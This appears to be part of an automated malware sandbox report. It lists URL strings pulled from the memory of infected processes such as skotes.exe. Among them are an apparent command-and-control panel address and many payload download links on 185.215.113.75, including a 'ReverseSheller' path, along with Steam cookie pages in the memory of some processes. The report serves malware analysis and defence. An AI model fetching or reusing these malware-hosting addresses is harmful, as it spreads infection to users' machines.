Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
Source: skotes.exe, 00000006.00000002.3405621850.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1296014716/PqodvBZ.exe
Source: skotes.exe, 00000006.00000002.3405621850.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1296014716/PqodvBZ.exeZ0123456789
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exe)
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exe.AppDataBK
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeC:
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeMLMEMhx
Source: skotes.exe, 00000006.00000002.3427219325.0000000005E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeUUC:
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeZ0123456789
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exea
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exec
Source: skotes.exe, 00000006.00000002.3405621850.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exed
Source: skotes.exe, 00000006.00000002.3405621850.0000000001209000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exekV9ZML.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeo
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exeuNko/index.php
Source: skotes.exe, 00000006.00000002.3405621850.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/2062973237/xkV9ZML.exex
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5377122953/KbSwZup.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5377122953/KbSwZup.exe?
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5377122953/KbSwZup.exeI
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5377122953/KbSwZup.exeu
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe
Source: skotes.exe, 00000006.00000002.3427219325.0000000005E50000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/6691015685/Bjkm5hE.exe
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe1ee3
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exece
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe~&
Source: skotes.exe, 00000006.00000002.3405621850.0000000001266000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/martin2/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/mia_hined/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exe#
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exe_
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/osint1618/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/osint1618/random.exe_
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/rast333a/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/unique2/random.exea
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 0000000C.00000002.3412332071.000002707D97F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 0000000C.00000003.2623071430.000002707D954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711331808.000002707D984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 0000000C.00000003.2748947261.000002707DE90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000000C.00000002.3414778320.000002707DE8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3413035578.000002707DE00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbpose
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000535D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ip.sb
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000535D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ip.sb.cdn.cloudflare.net
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: svchost.exe, 0000000C.00000002.3407663358.000002707D0AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: svchost.exe, 0000000C.00000003.2778991284.000002707D97A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2788453469.000002707D97E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2
Source: svchost.exe, 0000000C.00000003.2726734177.000002707D90E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2689652313.000002707D90E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2766312498.000002707D90E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2656755893.000002707D90E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778783779.000002707D95A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412332071.000002707D97F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412624540.000002707D986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2739243894.000002707DE52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2788406600.000002707D989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd(
Source: svchost.exe, 0000000C.00000002.3410957325.000002707D900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd.C
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd:pass
Source: svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
Source: svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdp
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdrypt
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds/200
Source: svchost.exe, 0000000C.00000003.2778991284.000002707D97A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x
Source: svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412332071.000002707D97F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412624540.000002707D986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2788406600.000002707D989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdI3I7B
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdcrypt
Source: svchost.exe, 0000000C.00000002.3410957325.000002707D900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdd
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdldsi
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdonse
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778991284.000002707D97A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 0000000C.00000003.2726987803.000002707D978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsnc#
Source: svchost.exe, 0000000C.00000002.3414778320.000002707DE83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: cbf2b6294a.exe, 00000019.00000003.3027687092.0000000005619000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3168409398.0000000005A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: svchost.exe, 0000000C.00000002.3415711340.000002707DEA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3408969366.000002707D0E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: svchost.exe, 0000000C.00000002.3411465531.000002707D937000.00000004.00000020.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000000C.00000002.3411465531.000002707D937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411298122.000002707D913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778783779.000002707D95A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411696324.000002707D95F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000000C.00000003.2689914167.000002707D979000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyAAAAA
Source: svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policytLbZX
Source: svchost.exe, 0000000C.00000002.3411465531.000002707D937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411298122.000002707D913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778783779.000002707D95A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411696324.000002707D95F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000000C.00000003.2778991284.000002707D97A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3412173173.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scAAAAA
Source: svchost.exe, 0000000C.00000002.3411696324.000002707D95F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scstf1p
Source: svchost.exe, 0000000C.00000002.3411465531.000002707D937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411298122.000002707D913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778783779.000002707D95A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411696324.000002707D95F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000000C.00000003.2711380469.000002707D96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
Source: svchost.exe, 0000000C.00000003.2711380469.000002707D96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
Source: svchost.exe, 0000000C.00000002.3411839782.000002707D96F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
Source: svchost.exe, 0000000C.00000003.2711380469.000002707D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2766399530.000002707D90E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3411839782.000002707D96F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3408198545.000002707D0B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000000C.00000002.3411839782.000002707D96F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2778840906.000002707D96E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 0000000C.00000003.2711276725.000002707D979000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2711423499.000002707D97B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustAAAAA
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000530F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
